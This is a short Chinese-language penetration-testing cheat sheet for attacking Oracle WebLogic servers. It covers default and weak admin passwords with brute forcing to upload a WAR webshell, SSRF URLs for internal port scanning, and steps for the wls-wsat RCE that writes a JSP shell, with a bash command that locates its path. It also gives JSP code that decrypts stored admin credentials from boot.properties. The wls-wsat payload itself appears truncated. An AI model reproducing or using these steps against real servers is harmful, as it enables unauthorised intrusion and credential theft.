針對weblogic測試的一些小總結
針對weblogic測試的一些小總結
1.管理員登錄頁面弱密碼
Weblogic的埠一般為7001,弱密碼一般為weblogic/Oracle@123 or weblogic,或者根據具體情況進行猜測,公司名,人名等等,再有就可以用burpsuite的intruder進行暴力破解,一旦成功就可以上傳war包getshell。
2.weblogic ssrf
Oracle WebLogic web server即可以被外部主機訪問,同時也允許訪問內部主機。如果存在此url http://192.168.8.128:7001/uddiexplorer/SearchPublicRegistries.jsp 都會存在ssrf
下面我們監聽一下192.168.1.59:139的139埠(開啟)跟138埠(未開啟)的返回,埠的開啟情況,
http://192.168.8.128:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.1.59:139&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
http://192.168.8.128:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.1.59:138&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
3 .weblogic反序列化
Wenlogic反序列化的漏洞已經被爆出很長時間,網上可以找出各種各樣的工具,在這裡我就不在多提了。
4.weblogic_uac
第一步 抓取http://x.x.x.x:7001/wls-wsat/CoordinatorPortType 對其發起POST請求(任意包都可以,只要url對就可以)
第二步 加入Content-Type:text/xml
第三步 在body中放入payload
servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/a.jsp
]]>
以上為默認路徑,如果不是默認路徑同時又是linux系統可用以下payload爆出路徑
/bin/bash
-c
find $DOMAIN_HOME -type d -name bea_wls_internal|while read f;do find $f -type d -name war;done|while read ff;do echo $ff >$ff/a.txt;done
5.weblogic 在線與離線解密
如有webshell可進行在線解密
把一下代碼放入伺服器進行訪問,紅色字體weblogic的加密密碼,可在boot.properties文件中找到。路徑為../../../Server/security/boot.properties
EncryptionService es = null;
ClearOrEncryptedService ces = null;
String s = null;
s="wfFNcH6k+9Nz22r1gCMnylgUr9Ho5kz8nDgib/TuOZU=";
es = SerializedSystemIni.getEncryptionService();
if (es == null) {
out.println("Unable to initialize encryption service");
return;
}
ces = new ClearOrEncryptedService(es);
if (s != null) {
out.println("
Decrypted Password is:" + ces.decrypt(s));
}
離線解密需要兩個文件SerializedSystemIni.dat跟boot.properties
TAG:5ecurity |